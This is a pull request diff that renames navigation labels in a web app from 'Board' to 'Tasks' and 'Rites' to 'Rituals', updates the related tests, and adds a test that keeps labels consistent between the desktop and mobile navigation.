### PR TITLE
feat(nav): one canonical name per surface — Tasks & Rituals everywhere (cave-m4ih.1)

### DIFF
--- a/scripts/capture-screenshots.mjs
+++ b/scripts/capture-screenshots.mjs
@@ -26,7 +26,7 @@ const CAPTURES = [
   { file: "home.png",     label: "HomeComposer cold-start",      click: "Home" },
   { file: "shell.png",    label: "Three-pane shell + chat",      click: "Chat" },
   { file: "chat.png",     label: "Chat view",                    click: "Chat" },
-  { file: "board.png",    label: "Board view",                   click: "Board" },
+  { file: "board.png",    label: "Tasks view",                   click: "Tasks" },
   { file: "calendar.png", label: "Calendar (week view)",         click: "Calendar" },
   { file: "floor.png",    label: "Coven Floor (Home ambient)",   click: "Home" },
 ];

--- a/scripts/run-tests.mjs
+++ b/scripts/run-tests.mjs
@@ -515,6 +515,7 @@ export const SUITES = {
     "src/components/cwd-picker-field.test.ts",
     "src/components/inbox-feed-a11y.test.ts",
     "src/components/rituals-tabs.test.ts",
+    "src/components/canonical-nav-names.test.ts",
     "src/lib/automations/automation-entry.test.ts",
     "src/lib/automations/list-input.test.ts",
     "src/lib/automations/run-status.test.ts",

--- a/src/app/daily-report/[date]/page.tsx
+++ b/src/app/daily-report/[date]/page.tsx
@@ -208,7 +208,7 @@ export default async function DailyReportPage({ params }: Props) {
                 icon="ph:kanban-bold"
                 value={stats.cardsCompleted}
                 label="Cards completed"
-                caption="Board work finished"
+                caption="Task work finished"
                 accent="amber"
                 trend={trendFor("cardsCompleted")}
               />
@@ -449,7 +449,7 @@ export default async function DailyReportPage({ params }: Props) {
           <div className="dr-quicklinks">
             <QuickLink href="/dashboard" icon="ph:squares-four" label="Dashboard" sub="Overview & reports" />
             <QuickLink href="/" icon="ph:house-bold" label="Home" sub="Your cave" />
-            <QuickLink href="/#card-" icon="ph:kanban-bold" label="Board" sub="Cards & tasks" />
+            <QuickLink href="/#card-" icon="ph:kanban-bold" label="Tasks" sub="Cards & tasks" />
             <QuickLink href="/" icon="ph:calendar-bold" label="Calendar" sub="Reminders & agenda" />
           </div>
         </section>

--- a/src/app/dashboard-page.test.ts
+++ b/src/app/dashboard-page.test.ts
@@ -176,7 +176,7 @@ assert.match(donut, /role: "img"/, "donut can expose an accessible summary");
 const heatmap = readFileSync(new URL("../components/ui/charts/heatmap.tsx", import.meta.url), "utf8");
 assert.match(heatmap, /<title>/, "heatmap cells carry native hover titles");
 assert.match(heatmap, /role: "img"/, "heatmap can expose an accessible summary");
-assert.match(cockpit, /ariaLabel=\{`Board status:/, "board donut passes a data summary to AT");
+assert.match(cockpit, /ariaLabel=\{`Task status:/, "Tasks donut passes a canonical data summary to AT");
 assert.match(cockpit, /ariaLabel=\{`Thread confidence metrics by familiar:/, "confidence heatmap passes a data summary to AT");
 
 // ── Drag a11y (cave-0k5b): titles, not ids ───────────────────────────────────

--- a/src/components/asana-queue-strip.tsx
+++ b/src/components/asana-queue-strip.tsx
@@ -99,7 +99,7 @@ export function AsanaQueueStrip({ onOpenUrl, onFiledBead, familiarId }: Props) {
       setBusyGid(item.gid);
       try {
         const res = await createBoardCardFromAsanaItem(item, null);
-        announce(res.ok ? `Added "${item.title}" to the board.` : `Couldn't add to board: ${res.error}`, res.ok ? "polite" : "assertive");
+        announce(res.ok ? `Added "${item.title}" to Tasks.` : `Couldn't add to Tasks: ${res.error}`, res.ok ? "polite" : "assertive");
       } finally {
         setBusyGid(null);
       }
@@ -193,9 +193,9 @@ export function AsanaQueueStrip({ onOpenUrl, onFiledBead, familiarId }: Props) {
                 leadingIcon="ph:plus"
                 loading={busy}
                 onClick={() => void addToBoard(item)}
-                title="Create a board card from this task"
+                title="Create a task card from this Asana task"
               >
-                Board
+                Tasks
               </Button>
               <Button
                 variant="secondary"

--- a/src/components/board-view.tsx
+++ b/src/components/board-view.tsx
@@ -231,7 +231,7 @@ export function BoardView({ familiars, sessions, activeFamiliarId, scopeFamiliar
     return () => document.removeEventListener("keydown", onKey);
   }, []);
   useEffect(() => { localStorage.setItem("cave:board:viewMode", viewMode); }, [viewMode]);
-  // The command palette can switch the board view directly (e.g. "Board: Gantt
+  // The command palette can switch the board view directly (e.g. "Tasks: Gantt
   // timeline"); honor it live when the board is already mounted.
   useEffect(() => {
     const onSetView = (e: Event) => {

--- a/src/components/calendar-view.tsx
+++ b/src/components/calendar-view.tsx
@@ -662,7 +662,7 @@ function DeadlineStrip({
       <div className="sticky left-0 z-10 flex w-12 shrink-0 items-center justify-end border-r border-[var(--border-hairline)] bg-[var(--bg-panel)] py-1 pr-1.5">
         <span
           className="text-[9px] uppercase tracking-wider text-[var(--text-secondary)] leading-tight text-right"
-          title="Task due dates from the Board — separate from your scheduled reminders below"
+          title="Task due dates from Tasks — separate from your scheduled reminders below"
         >
           Due
         </span>

--- a/src/components/canonical-nav-names.test.ts
+++ b/src/components/canonical-nav-names.test.ts
@@ -1,0 +1,77 @@
+// @ts-nocheck
+// Canonical navigation vocabulary (issue #3283, bead cave-m4ih.1): one surface,
+// one user-facing name, on every platform. The desktop sidebar's FOLDER_MODES
+// is the source of truth; the mobile bottom tabs and the workspace sr-title map
+// must agree with it for every destination they share. This pin exists because
+// the same surface previously shipped as "Tasks" (desktop) / "Board" (mobile)
+// and "Rituals" (desktop) / "Rites" (mobile) at the same time.
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+
+const sidebar = readFileSync(new URL("./sidebar-minimal.tsx", import.meta.url), "utf8");
+const mobileTabs = readFileSync(new URL("./mobile-bottom-tabs.tsx", import.meta.url), "utf8");
+const workspace = readFileSync(new URL("./workspace.tsx", import.meta.url), "utf8");
+
+// Extract `id -> label` pairs from `{ id: "...", label: "..." }` object rows.
+function extractLabels(source, blockName, blockRe) {
+  const block = source.match(blockRe)?.[0];
+  assert.ok(block, `${blockName} block should be extractable`);
+  const labels = new Map();
+  for (const m of block.matchAll(/\{ id: "([a-z-]+)", label: "([^"]+)"/g)) {
+    labels.set(m[1], m[2]);
+  }
+  assert.ok(labels.size > 0, `${blockName} should declare id/label rows`);
+  return labels;
+}
+
+const sidebarLabels = extractLabels(
+  sidebar,
+  "FOLDER_MODES",
+  /const FOLDER_MODES[\s\S]*?\n\];/,
+);
+const mobileLabels = extractLabels(
+  mobileTabs,
+  "TABS",
+  /const TABS[\s\S]*?\n\];/,
+);
+
+// ── Mobile bottom tabs use the sidebar's canonical labels ────────────────────
+let sharedTabs = 0;
+for (const [id, label] of mobileLabels) {
+  const canonical = sidebarLabels.get(id);
+  if (canonical === undefined) continue;
+  sharedTabs += 1;
+  assert.equal(
+    label,
+    canonical,
+    `mobile tab "${id}" must use the canonical sidebar label "${canonical}", got "${label}"`,
+  );
+}
+assert.ok(sharedTabs >= 3, "mobile tabs should share several destinations with the sidebar");
+
+// ── The sr-only h1 / split-tile title map agrees for sidebar destinations ────
+const titlesBlock = workspace.match(
+  /const WORKSPACE_MODE_TITLES: Record<WorkspaceMode, string> = \{[\s\S]*?\n\};/,
+)?.[0];
+assert.ok(titlesBlock, "WORKSPACE_MODE_TITLES should be extractable");
+const modeTitles = new Map();
+for (const m of titlesBlock.matchAll(/"?([a-z-]+)"?: "([^"]+)"/g)) {
+  modeTitles.set(m[1], m[2]);
+}
+for (const [id, canonical] of sidebarLabels) {
+  const title = modeTitles.get(id);
+  if (title === undefined) continue;
+  assert.equal(
+    title,
+    canonical,
+    `WORKSPACE_MODE_TITLES["${id}"] must use the canonical sidebar label "${canonical}", got "${title}"`,
+  );
+}
+
+// Alias modes that render another surface's view keep that surface's name —
+// they must never introduce a new peer vocabulary (issue #3283 acceptance:
+// "Compatibility aliases do not appear as peer destinations").
+assert.equal(modeTitles.get("calendar"), modeTitles.get("inbox"), "calendar is a tab of Rituals, not a new name");
+assert.equal(modeTitles.get("familiar-work-queue"), modeTitles.get("board"), "the work queue is a tab of Tasks, not a new name");
+
+console.log("canonical-nav-names: ok");

--- a/src/components/chat-empty-state.tsx
+++ b/src/components/chat-empty-state.tsx
@@ -400,7 +400,7 @@ export function ChatEmptyState({
                           );
                         })}
                         {moreCount > 0 ? (
-                          <span className="cave-chat-empty-work-more">+{moreCount} more on the board</span>
+                          <span className="cave-chat-empty-work-more">+{moreCount} more in Tasks</span>
                         ) : null}
                       </>
                     )}

--- a/src/components/command-palette.test.ts
+++ b/src/components/command-palette.test.ts
@@ -208,10 +208,10 @@ assert.match(
   "workspace latches then opens the Projects tab and focuses the chosen project",
 );
 
-// Board view-switch: the palette offers "Board: Kanban/Table/Gantt" rows that
-// jump to the board and set its view; the board honors the live switch.
+// Tasks view-switch: the palette offers "Tasks: Kanban/Table/Gantt" rows that
+// jump to the Tasks board and set its view; the board honors the live switch.
 assert.match(source, /kind: "set-board-view"; view: "kanban" \| "table" \| "gantt"/, "a set-board-view intent exists");
-assert.match(source, /label: "Board: Gantt timeline"/, "a Gantt board-view row is offered");
+assert.match(source, /label: "Tasks: Gantt timeline"/, "a Gantt board-view row is offered");
 assert.match(source, /intent: \{ kind: "set-board-view", view: v\.view \}/, "board-view rows carry the set-board-view intent");
 assert.match(source, /\.\.\.boardViewRows/, "board-view rows are included in the result list");
 assert.match(

--- a/src/components/command-palette.tsx
+++ b/src/components/command-palette.tsx
@@ -1211,7 +1211,7 @@ export function CommandPalette({
                       <span className="flex min-w-0 flex-1 flex-col">
                         <span className="truncate text-[var(--text-primary)]">Create task: {row.title}</span>
                         <span className="truncate text-[10px] text-[var(--text-muted)]">
-                          New card on the board, scoped to the active familiar
+                          New task in Tasks, scoped to the active familiar
                         </span>
                       </span>
                       {active ? <span className="text-[10px] text-[var(--text-muted)]">create</span> : null}

--- a/src/components/command-palette.tsx
+++ b/src/components/command-palette.tsx
@@ -612,12 +612,12 @@ export function CommandPalette({
             intent: { kind: "open-project", root: p.root },
           }));
 
-    // "Board: …" rows jump to the board and switch its view directly. Hidden
-    // while scoped or typing a slash command.
+    // "Tasks: …" rows jump to the Tasks board and switch its view directly.
+    // Hidden while scoped or typing a slash command.
     const BOARD_VIEWS: Array<{ view: "kanban" | "table" | "gantt"; label: string; hint: string; terms: string }> = [
-      { view: "kanban", label: "Board: Kanban", hint: "Columns by status", terms: "board kanban columns" },
-      { view: "table", label: "Board: Table", hint: "Sortable task table", terms: "board table list" },
-      { view: "gantt", label: "Board: Gantt timeline", hint: "Schedule timeline", terms: "board gantt timeline schedule" },
+      { view: "kanban", label: "Tasks: Kanban", hint: "Columns by status", terms: "tasks board kanban columns" },
+      { view: "table", label: "Tasks: Table", hint: "Sortable task table", terms: "tasks board table list" },
+      { view: "gantt", label: "Tasks: Gantt timeline", hint: "Schedule timeline", terms: "tasks board gantt timeline schedule" },
     ];
     const boardViewRows: Row[] = (scoped || slashToken)
       ? []

--- a/src/components/dashboard/cockpit-panels.tsx
+++ b/src/components/dashboard/cockpit-panels.tsx
@@ -296,7 +296,7 @@ export function BoardSnapshot({ byStatus, total, active, loaded, familiars }: {
   byStatus: Map<CardStatus, number>; total: number; active: Card[]; loaded: boolean; familiars: Familiar[];
 }) {
   if (!loaded) return <PanelSkeleton rows={3} />;
-  if (total === 0) return <EmptyState icon="ph:kanban-bold">No cards on the board yet.</EmptyState>;
+  if (total === 0) return <EmptyState icon="ph:kanban-bold">No task cards yet.</EmptyState>;
   const segs = STATUS_ORDER.map((s) => ({ s, n: byStatus.get(s) ?? 0 })).filter((x) => x.n > 0);
   const famName = (id: string | null) => familiars.find((f) => f.id === id)?.display_name;
   return (
@@ -305,7 +305,7 @@ export function BoardSnapshot({ byStatus, total, active, loaded, familiars }: {
         data={segs.map(({ s, n }) => ({ label: STATUS_META[s].label, value: n, color: STATUS_META[s].color }))}
         size={132}
         thickness={18}
-        ariaLabel={`Board status: ${segs.map(({ s, n }) => `${STATUS_META[s].label} ${n}`).join(", ")}`}
+        ariaLabel={`Task status: ${segs.map(({ s, n }) => `${STATUS_META[s].label} ${n}`).join(", ")}`}
       />
       <div className="cockpit-bar__legend">
         {segs.map(({ s, n }) => (
@@ -595,5 +595,4 @@ export function SpaceUsagePanel({ rows, loaded }: { rows: SpaceUsageRow[]; loade
 function PanelSkeleton({ rows }: { rows: number }) {
   return <div className="cockpit-skel">{Array.from({ length: rows }).map((_, i) => <span key={i} className="cockpit-skel__row" />)}</div>;
 }
-
 

--- a/src/components/dashboard/dashboard-cockpit.tsx
+++ b/src/components/dashboard/dashboard-cockpit.tsx
@@ -414,7 +414,7 @@ export function DashboardCockpit({ model: initialModel }: { model: DashboardMode
       // and its frozen count husked after the last item was cleared.
       case "needs": return <ActionInbox initialItems={model.needsAttention} openCount={model.openCount} onOpenCount={setLiveOpen} />;
       case "board": return (
-        <Panel title="Board" icon="ph:kanban-bold" hint={`${open.length} open`} href="/?mode=board">
+        <Panel title="Tasks" icon="ph:kanban-bold" hint={`${open.length} open`} href="/?mode=board">
           <BoardSnapshot byStatus={byStatus} total={data.cards.length} active={activeCards} loaded={ready.has("cards")} familiars={data.familiars} />
         </Panel>);
       case "today": return <TodaySummary summary={model.todaySummary} featured={model.featuredReport} now={now} />;
@@ -525,7 +525,7 @@ export function DashboardCockpit({ model: initialModel }: { model: DashboardMode
         <SectionHead icon="ph:squares-four" title="Jump back in" />
         <div className="cockpit-quicklinks">
           <QuickLink href="/" icon="ph:house-bold" label="Home" sub="Your cave" />
-          <QuickLink href="/?mode=board" icon="ph:kanban-bold" label="Board" sub="Cards & tasks" />
+          <QuickLink href="/?mode=board" icon="ph:kanban-bold" label="Tasks" sub="Cards & tasks" />
           <QuickLink href="/dashboard/familiars/growth" icon="ph:chart-bar-bold" label="Growth" sub="Familiar performance" />
           <QuickLink href="/?mode=calendar" icon="ph:calendar-bold" label="Calendar" sub="Reminders & agenda" />
           <QuickLink href="/settings" icon="ph:gear-six" label="Settings" sub="Preferences" />

--- a/src/components/familiar-asana-section.tsx
+++ b/src/components/familiar-asana-section.tsx
@@ -232,7 +232,7 @@ export function FamiliarAsanaSection({ familiar }: { familiar: ResolvedFamiliar 
             {enabled
               ? `${familiar.display_name} sees your assigned Asana tasks${
                   workspaceGid ? " in the selected workspace" : ""
-                } on the board and in the Queue.`
+                } in Tasks and in the Queue.`
               : `${familiar.display_name} is opted out of Asana. Other familiars keep their access.`}
             {login ? ` · Connected as ${login}.` : ""}
           </p>

--- a/src/components/github-action-popover.tsx
+++ b/src/components/github-action-popover.tsx
@@ -353,7 +353,7 @@ export function GitHubActionPopover({
   useFocusTrap(true, ref, { onEscape: onClose });
 
   const TITLES: Record<PopoverMode, string> = {
-    board: "Add to board",
+    board: "Add to Tasks",
     chat: "Start chat",
     assign: "Assign to familiar",
   };

--- a/src/components/home-composer.tsx
+++ b/src/components/home-composer.tsx
@@ -582,7 +582,7 @@ export function HomeComposer({
           });
           const json = (await res.json().catch(() => ({ ok: false }))) as { ok: boolean };
           if (json.ok) { setText(""); clearDraft(); clearAttachments(); promptEnhance.reset(); onNavigateToBoard(); }
-          else onToast("Board card creation failed.");
+          else onToast("Task card creation failed.");
           break;
         }
       }

--- a/src/components/journal/journal-entries.tsx
+++ b/src/components/journal/journal-entries.tsx
@@ -109,7 +109,7 @@ function NextPaths({
           const json = await res.json().catch(() => ({ ok: false }));
           if (!res.ok || !json.ok) throw new Error();
           flashDone(key);
-          onNotice("Added to your task board.", { label: "View tasks", mode: "board" });
+          onNotice("Added to Tasks.", { label: "View tasks", mode: "board" });
         } else {
           // Reminder: default to tomorrow 9:00am local; the user can retime it
           // from Automations. One click should never demand a date picker.

--- a/src/components/mobile-bottom-tabs.tsx
+++ b/src/components/mobile-bottom-tabs.tsx
@@ -2,8 +2,10 @@
 
 /**
  * MobileBottomTabs — fixed/sticky bottom navigation strip for mobile/tablet
- * viewports. Surfaces the most-used destinations (Home, Familiars, Board, Rituals)
- * as a tablist with icon + label and an active highlight.
+ * viewports. Surfaces the most-used destinations (Home, Chat, Tasks, Rituals)
+ * as a tablist with icon + label and an active highlight. Labels use the
+ * canonical surface names shared with the desktop sidebar (issue #3283 —
+ * one surface, one name).
  *
  * Renders only when the parent shell is in mobile mode (≤1023px); Shell is
  * responsible for that conditional render — this component itself doesn't
@@ -24,8 +26,8 @@ type TabDef = {
 const TABS: TabDef[] = [
   { id: "home", label: "Home", ariaLabel: "Home", iconName: "ph:house-bold" },
   { id: "chat", label: "Chat", ariaLabel: "Chat", iconName: "ph:chats" },
-  { id: "board", label: "Board", ariaLabel: "Board", iconName: "ph:kanban" },
-  { id: "inbox", label: "Rites", ariaLabel: "Rituals", iconName: "ph:calendar-check" },
+  { id: "board", label: "Tasks", ariaLabel: "Tasks", iconName: "ph:kanban" },
+  { id: "inbox", label: "Rituals", ariaLabel: "Rituals", iconName: "ph:calendar-check" },
 ];
 
 export type MobileBottomTabsProps = {

--- a/src/components/mobile-shell-smoke.test.ts
+++ b/src/components/mobile-shell-smoke.test.ts
@@ -32,8 +32,8 @@ assert.match(
 
 assert.match(
   mobileTabs,
-  /{ id: "inbox", label: "Rites", ariaLabel: "Rituals", iconName: "ph:calendar-check" }/,
-  "Mobile bottom tabs should keep the Rituals label short while preserving the full accessible name",
+  /{ id: "inbox", label: "Rituals", ariaLabel: "Rituals", iconName: "ph:calendar-check" }/,
+  "Mobile bottom tabs should use the canonical Rituals name for both the visible label and the accessible name",
 );
 
 assert.match(

--- a/src/components/projects/detail-sections.tsx
+++ b/src/components/projects/detail-sections.tsx
@@ -209,7 +209,7 @@ export function TasksSection({
                     onOpenBoard?.();
                     window.location.hash = `card-${card.id}`;
                   }}
-                  title={`Open "${card.title}" on the board`}
+                  title={`Open "${card.title}" in Tasks`}
                   className="focus-ring-inset flex w-full items-center gap-2 rounded-[var(--radius-control)] px-1 py-1 text-left text-[12px] text-[var(--text-secondary)] hover:bg-[var(--bg-hover)] hover:text-[var(--text-primary)]"
                 >
                   <span
@@ -226,7 +226,7 @@ export function TasksSection({
           </ul>
           {open.length > TASK_CAP ? (
             <p className="mt-1 px-1 text-[10px] text-[var(--text-muted)]">
-              +{open.length - TASK_CAP} more on the board
+              +{open.length - TASK_CAP} more in Tasks
               {doneCount > 0 ? ` · ${doneCount} done` : ""}
             </p>
           ) : doneCount > 0 ? (

--- a/src/components/projects/project-detail.tsx
+++ b/src/components/projects/project-detail.tsx
@@ -400,7 +400,7 @@ export function ProjectDetail({
               leadingIcon="ph:kanban"
               title="Open the Tasks board"
             >
-              Board
+              Tasks
             </Button>
           ) : null}
           <OverflowMenu ariaLabel={`More actions for ${project.name}`} size="sm">

--- a/src/components/reminder-link-field.test.ts
+++ b/src/components/reminder-link-field.test.ts
@@ -34,9 +34,9 @@ assert.match(field, /\{ kind: "card", ref:/, "card selection emits a card LinkRe
 assert.match(field, /\{ kind: "session", ref:/, "session selection emits a session LinkRef");
 
 // ── Graceful loading / empty / error states ──────────────────────────────────
-assert.match(field, /Loading board cards/, "should render a loading hint for cards");
-assert.match(field, /No board cards yet/, "should render an empty hint for cards");
-assert.match(field, /Couldn't load board cards/, "should render a fetch-error hint for cards");
+assert.match(field, /Loading task cards/, "should render a canonical loading hint for cards");
+assert.match(field, /No task cards yet/, "should render a canonical empty hint for cards");
+assert.match(field, /Couldn't load task cards/, "should render a canonical fetch-error hint for cards");
 assert.match(field, /rounded-\[var\(--radius-control\)\]/, "link controls should use the shared control radius token");
 assert.doesNotMatch(field, /rounded-md/, "link controls should not hard-code Tailwind's md radius");
 

--- a/src/components/reminder-link-field.test.ts
+++ b/src/components/reminder-link-field.test.ts
@@ -5,10 +5,10 @@ import { readFileSync } from "node:fs";
 const field = readFileSync(new URL("./reminder-link-field.tsx", import.meta.url), "utf8");
 const modal = readFileSync(new URL("./new-reminder-modal.tsx", import.meta.url), "utf8");
 
-// ── Kind options: None / URL / Board card / Chat session, NO Memory ──────────
+// ── Kind options: None / URL / Task card / Chat session, NO Memory ───────────
 assert.match(field, /value: "none", label: "No link"/, "should offer a None option");
 assert.match(field, /value: "url", label: "URL"/, "should offer a URL option");
-assert.match(field, /value: "card", label: "Board card"/, "should offer a Board card option");
+assert.match(field, /value: "card", label: "Task card"/, "should offer a Task card option");
 assert.match(field, /value: "session", label: "Chat session"/, "should offer a Chat session option");
 assert.doesNotMatch(
   field,

--- a/src/components/reminder-link-field.tsx
+++ b/src/components/reminder-link-field.tsx
@@ -16,7 +16,7 @@ let sessionCache: Option[] | null = null;
 const KIND_OPTIONS: { value: LinkKind; label: string }[] = [
   { value: "none", label: "No link" },
   { value: "url", label: "URL" },
-  { value: "card", label: "Board card" },
+  { value: "card", label: "Task card" },
   { value: "session", label: "Chat session" },
 ];
 
@@ -155,7 +155,7 @@ export function ReminderLinkField({
             <div className={hintClass}>No board cards yet.</div>
           ) : (
             <StandardSelect
-              label="Board card"
+              label="Task card"
               value={value?.kind === "card" ? value.ref : ""}
               onChange={(next) => onChange(next ? { kind: "card", ref: next } : null)}
               options={cardOptions}

--- a/src/components/reminder-link-field.tsx
+++ b/src/components/reminder-link-field.tsx
@@ -65,7 +65,7 @@ export function ReminderLinkField({
       cardCache = list;
       setCards(list);
     } catch {
-      setFetchError("Couldn't load board cards.");
+      setFetchError("Couldn't load task cards.");
     } finally {
       setLoading(false);
     }
@@ -148,11 +148,11 @@ export function ReminderLinkField({
       {kind === "card" && (
         <div className="relative">
           {loading && !cards ? (
-            <div className={hintClass}>Loading board cards…</div>
+            <div className={hintClass}>Loading task cards…</div>
           ) : fetchError ? (
             <div className={hintClass}>{fetchError}</div>
           ) : cards && cards.length === 0 ? (
-            <div className={hintClass}>No board cards yet.</div>
+            <div className={hintClass}>No task cards yet.</div>
           ) : (
             <StandardSelect
               label="Task card"

--- a/src/components/rituals-tabs.test.ts
+++ b/src/components/rituals-tabs.test.ts
@@ -27,8 +27,8 @@ assert.match(
 );
 assert.match(
   mobileTabs,
-  /\{ id: "inbox", label: "Rites", ariaLabel: "Rituals", iconName: "ph:calendar-check" \}/,
-  "Mobile bottom tab uses a short visible Rites label and full Rituals aria label",
+  /\{ id: "inbox", label: "Rituals", ariaLabel: "Rituals", iconName: "ph:calendar-check" \}/,
+  "Mobile bottom tab uses the canonical Rituals label (one surface, one name — issue #3283)",
 );
 assert.match(
   notificationBell,

--- a/src/components/salem/salem-context.ts
+++ b/src/components/salem/salem-context.ts
@@ -141,7 +141,7 @@ export const SALEM_PRELOAD_CONTEXT: SalemPreloadContext = {
     {
       id: "tasks",
       label: "Tasks",
-      purpose: "Workboard cards, familiar assignment, and execution tracking.",
+      purpose: "Task cards, familiar assignment, and execution tracking.",
     },
     {
       id: "roles",

--- a/src/components/salem/salem-home-entry.test.ts
+++ b/src/components/salem/salem-home-entry.test.ts
@@ -9,11 +9,11 @@ const sidebar = await read("../sidebar-minimal.tsx");
 const projects = await read("../projects-view.tsx");
 const boardRoute = await read("../../app/api/board/route.ts");
 
-// Card: Save-to-Board is an explicit two-click confirm with save/saved/error feedback.
+// Card: Save-to-Tasks is an explicit two-click confirm with save/saved/error feedback.
 assert.match(card, /onSave\?: \(card: SalemPathfinderCard\) => Promise<boolean> \| void/, "onSave reports success");
 assert.match(card, /"idle" \| "confirm" \| "saving" \| "saved" \| "error"/, "tracks save lifecycle");
 assert.match(card, /if \(saveState === "idle"\)[\s\S]{0,80}setSaveState\("confirm"\)/, "first click arms confirm");
-assert.match(card, /Confirm — save to Board/, "second click confirms the save");
+assert.match(card, /Confirm — save to Tasks/, "second click confirms the save");
 assert.match(card, /salem-pf__action--save/, "renders a dedicated save button");
 
 // Salem panel: home card is wired to save to the Board with labels + steps.

--- a/src/components/salem/salem-home-entry.test.ts
+++ b/src/components/salem/salem-home-entry.test.ts
@@ -16,7 +16,7 @@ assert.match(card, /if \(saveState === "idle"\)[\s\S]{0,80}setSaveState\("confir
 assert.match(card, /Confirm — save to Tasks/, "second click confirms the save");
 assert.match(card, /salem-pf__action--save/, "renders a dedicated save button");
 
-// Salem panel: home card is wired to save to the Board with labels + steps.
+// Salem panel: home card is wired to save to Tasks with labels + steps.
 assert.match(widget, /onSave=\{saveCardToBoard\}/, "panel passes the save handler");
 assert.match(widget, /\/api\/board/, "save posts to the board API");
 assert.match(widget, /labels: \["salem", "happy-path", card\.recommendedPathId\]/, "tags the board card");

--- a/src/components/salem/salem-pathfinder-card.tsx
+++ b/src/components/salem/salem-pathfinder-card.tsx
@@ -94,10 +94,10 @@ export function SalemPathfinderCard({ card, density = "full", onRoute, onRunDoct
     }
   };
   const SAVE_LABEL: Record<string, string> = {
-    idle: "Save to Board",
-    confirm: "Confirm — save to Board",
+    idle: "Save to Tasks",
+    confirm: "Confirm — save to Tasks",
     saving: "Saving…",
-    saved: "Saved to Board",
+    saved: "Saved to Tasks",
     error: "Save failed — retry",
   };
   const slim = density === "slim";

--- a/src/components/salem/salem-pathfinder-card.tsx
+++ b/src/components/salem/salem-pathfinder-card.tsx
@@ -76,7 +76,7 @@ export function SalemPathfinderCard({ card, density = "full", onRoute, onRunDoct
     setFeedback("sent");
   };
 
-  // Save-to-Board requires an explicit confirm: first click arms, second saves.
+  // Save-to-Tasks requires an explicit confirm: first click arms, second saves.
   const handleSave = async () => {
     if (!onSave) return;
     if (saveState === "idle") {

--- a/src/components/salem/salem-widget.tsx
+++ b/src/components/salem/salem-widget.tsx
@@ -64,7 +64,7 @@ export function SalemChatPanel({ familiarId, model }: { familiarId?: string | nu
     }).catch(() => {});
   };
 
-  // Save a recommended path to the Board as a card + checklist (design §"Data
+  // Save a recommended path to Tasks as a card + checklist (design §"Data
   // Flow" step 8). The card requires an explicit confirm before calling this.
   const saveCardToBoard = async (card: SalemPathfinderCardData): Promise<boolean> => {
     const notes = [

--- a/src/components/thread-signals-section.test.ts
+++ b/src/components/thread-signals-section.test.ts
@@ -315,8 +315,8 @@ describe("signal table UX — sticky header, coarse-pointer overflow, empty disc
     assert.match(source, /coarsePointer \? \(/, "coarse pointers take the consolidated branch");
     assert.match(source, /<OverflowMenu ariaLabel=\{`Actions for signal \$\{row\.signal\}`\}/, "the ⋯ trigger names its signal");
     assert.match(source, /Resolve in a thread/, "menu carries the resolve action");
-    assert.match(source, /Add task to board/, "menu carries the task action");
-    assert.match(source, /Task already on board/, "settled rows read as settled inside the menu");
+    assert.match(source, /Add task to Tasks/, "menu carries the canonical task action");
+    assert.match(source, /Task already in Tasks/, "settled rows use the canonical Tasks name");
   });
 
   it("shows one empty state when the aggregate carries no signals at all", () => {

--- a/src/components/thread-signals-section.tsx
+++ b/src/components/thread-signals-section.tsx
@@ -300,7 +300,7 @@ function ThreadSignalsTable({
       });
     }
     if (succeeded.length === targets.length) {
-      announce(succeeded.length === 1 ? "Added 1 task to the board." : `Added ${succeeded.length} tasks to the board.`);
+      announce(succeeded.length === 1 ? "Added 1 task to Tasks." : `Added ${succeeded.length} tasks to Tasks.`);
     } else {
       announce(`Added ${succeeded.length} of ${targets.length} tasks — the rest failed, try again.`);
     }
@@ -349,7 +349,7 @@ function ThreadSignalsTable({
                 disabled={isAdded || isPending}
                 onSelect={() => void createTasks([row])}
               >
-                {isAdded ? "Task already on board" : "Add task to board"}
+                {isAdded ? "Task already in Tasks" : "Add task to Tasks"}
               </PopoverItem>
             </OverflowMenu>
           ) : (
@@ -367,7 +367,7 @@ function ThreadSignalsTable({
                 </Button>
               ) : null}
               {isAdded ? (
-                <span className="fa-thread-table__added" title="A task card exists on the board for this signal">
+                <span className="fa-thread-table__added" title="A task card exists in Tasks for this signal">
                   <Icon name="ph:check-circle" width={13} aria-hidden /> Task
                 </span>
               ) : (
@@ -378,7 +378,7 @@ function ThreadSignalsTable({
                   leadingIcon="ph:plus"
                   onClick={() => void createTasks([row])}
                   aria-label={`Add task for ${row.signal}`}
-                  title="Create a task card on the board from this signal"
+                  title="Create a task card in Tasks from this signal"
                 >
                   Task
                 </Button>
@@ -422,7 +422,7 @@ function ThreadSignalsTable({
           leadingIcon="ph:kanban"
           disabled={selectedCount === 0}
           onClick={() => void createTasks(allRows.filter((row) => selected.has(row.id)))}
-          title="Create board task cards from the selected signals"
+          title="Create task cards in Tasks from the selected signals"
         >
           Add {selectedCount > 0 ? selectedCount : ""} as tasks
         </Button>

--- a/src/components/workspace.tsx
+++ b/src/components/workspace.tsx
@@ -166,11 +166,13 @@ function splitTargetTitle(target: SplitTarget): string {
 
 // CHAT-D13-05 (axe page-has-heading-one): the shell renders no visible page
 // title, so the detail pane carries a visually-hidden h1 naming the active
-// surface. Labels mirror the sidebar's vocabulary.
+// surface. Labels mirror the sidebar's canonical vocabulary (issue #3283 —
+// one surface, one name): alias modes that render another surface's view
+// (calendar, familiar-work-queue) reuse that surface's name.
 const WORKSPACE_MODE_TITLES: Record<WorkspaceMode, string> = {
   agents: "Familiars",
   home: "Home",
-  chat: "Familiars",
+  chat: "Chat",
   groupchat: "Group Chat",
   board: "Tasks",
   calendar: "Rituals",
@@ -182,7 +184,7 @@ const WORKSPACE_MODE_TITLES: Record<WorkspaceMode, string> = {
   flow: "Flow",
   submissions: "Submissions",
   capabilities: "Capabilities",
-  "familiar-work-queue": "Queue",
+  "familiar-work-queue": "Tasks",
   journal: "Journal",
   grimoire: "Memories",
 };

--- a/src/lib/cave-board-steps.test.ts
+++ b/src/lib/cave-board-steps.test.ts
@@ -4,7 +4,7 @@ import { mkdtemp, rm } from "node:fs/promises";
 import { tmpdir } from "node:os";
 import path from "node:path";
 
-// Salem "Save to Board" seeds a card with checklist steps. createCard must
+// Salem "Save to Tasks" seeds a card with checklist steps. createCard must
 // accept `steps: {text}[]` and round-trip them into CardStep[]. Isolated to a
 // temp home so it never touches the real ~/.coven/cave/board.json.
 

--- a/src/lib/chat-starter-suggestions.ts
+++ b/src/lib/chat-starter-suggestions.ts
@@ -80,8 +80,8 @@ export function deriveStarterSuggestions(opts: {
     });
     out.push({
       id: "plan-feature",
